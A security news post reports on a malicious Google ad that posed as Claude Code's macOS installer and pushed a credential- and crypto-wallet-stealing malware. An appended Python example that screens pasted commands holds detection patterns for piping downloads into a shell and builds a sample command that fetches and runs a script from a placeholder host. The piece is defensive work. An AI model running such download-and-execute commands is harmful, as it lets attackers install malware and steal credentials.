Google Ad Used to Spread macOS Credential-Stealing Malware

Posted on July 1, 2026 By CWS

A Google-sponsored advertisement posing as Anthropic’s Claude Code CLI has been identified as delivering a macOS credential-stealing malware named “MacSync Stealer.” This malicious software also targets Ledger Live and Ledger Wallet applications to extract cryptocurrency seed phrases.

Uncovering the Malicious Campaign

Researchers at Beelzebub Labs discovered this campaign through their threat intelligence platform, Caronte, following the submission of a suspicious terminal command for analysis. The deceptive ad appeared when users searched for “claude code mac install,” placing it above legitimate search results.

When clicked, users were directed to a counterfeit installation page on sites.google.com, designed to imitate Anthropic’s branding. This page falsely claimed over 12 million downloads and provided a one-click copy button for a harmful terminal command.

Technical Tactics Employed

The attackers chose Google Sites because it renders its content through JavaScript, which made the fake page invisible to automated security scanners. The browsers of human visitors, however, executed the script and loaded the fake page. Trusted domains like sites.google.com often bypass security checks, making this tactic particularly effective.

To deceive less experienced users, the page included a “New to Terminal?” guide, leading them through a fake installation process that normalized entering an admin password. This primed victims to comply with subsequent phishing prompts.

Detailed Breakdown of the Attack

The attack unfolded in six interconnected stages, running from the ad click to full credential theft and potential wallet hijacking. These stages included a fake install page, a malicious terminal command, and a fake password prompt used to capture the Mac login password.

The malware, disguised as a System Preferences prompt, captured passwords, enabling it to access encrypted keychains and browser credentials. For those with Ledger applications, the malware replaced app code, leading to persistent wallet hijacking.

Security Implications and Recommendations

Beelzebub Labs reported the malicious ad to Google, resulting in its removal within 24 hours. However, attackers are known to frequently change URLs to evade detection. Developers are advised to download tools directly from official sources and view any encoded terminal commands with suspicion.

Users who suspect exposure should change their Mac passwords and rotate browser-stored credentials. Recognizing and avoiding these tactics can significantly reduce the risk of credential and data theft.
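One way to act on the advice to treat encoded terminal commands with suspicion is to decode a copied command and inspect it before it is ever pasted into a shell. The following is an added example, not code from the article or from Beelzebub Labs; the rule set, function names and the sample command (with its `example.invalid` URL) are constructed for illustration and do not reproduce the command used in the campaign.

```python
import base64
import re

# Illustrative heuristics for this example only, not a complete detection set.
SHELL = r"\|\s*(sudo\s+)?(sh|bash|zsh)\b"
RULES = {
    "decode-to-shell": re.compile(r"base64\s+(-d|-D|--decode)\b[^|]*" + SHELL),
    "download-to-shell": re.compile(r"\b(curl|wget)\b[^|;]*" + SHELL),
    "hidden-url": re.compile(r"https?://[^\s\"']+"),  # only reported in decoded layers
}
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_layers(command, max_depth=3):
    """Return the pasted command followed by each text layer hidden in base64 tokens."""
    layers, stack = [command], [(command, 0)]
    while stack:
        text, depth = stack.pop()
        if depth >= max_depth:
            continue
        for token in B64_TOKEN.findall(text):
            try:
                decoded = base64.b64decode(token, validate=True).decode("utf-8")
            except ValueError:  # covers invalid base64 and non-UTF-8 bytes
                continue
            if all(ch.isprintable() or ch in "\n\t" for ch in decoded):
                layers.append(decoded)
                stack.append((decoded, depth + 1))
    return layers


def triage(command):
    """Return sorted (layer, rule) findings; layer 0 is the text as pasted. Nothing is executed."""
    findings = set()
    for i, layer in enumerate(decode_layers(command)):
        for name, rule in RULES.items():
            if name == "hidden-url" and i == 0:
                continue  # a visible URL is normal; one hidden inside an encoded blob is not
            if rule.search(layer):
                findings.add((i, name))
    return sorted(findings)


# Constructed sample, not the command from the reported campaign.
_hidden = b"curl -fsSL https://example.invalid/install.sh | zsh"
SAMPLE = 'echo "' + base64.b64encode(_hidden).decode() + '" | base64 -D | zsh'

if __name__ == "__main__":
    for layer, rule in triage(SAMPLE):
        print(f"layer {layer}: {rule}")
```

A finding on layer 1 or deeper means the behaviour was only visible after decoding, which is the property that makes a copy-and-paste install command worth rejecting.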
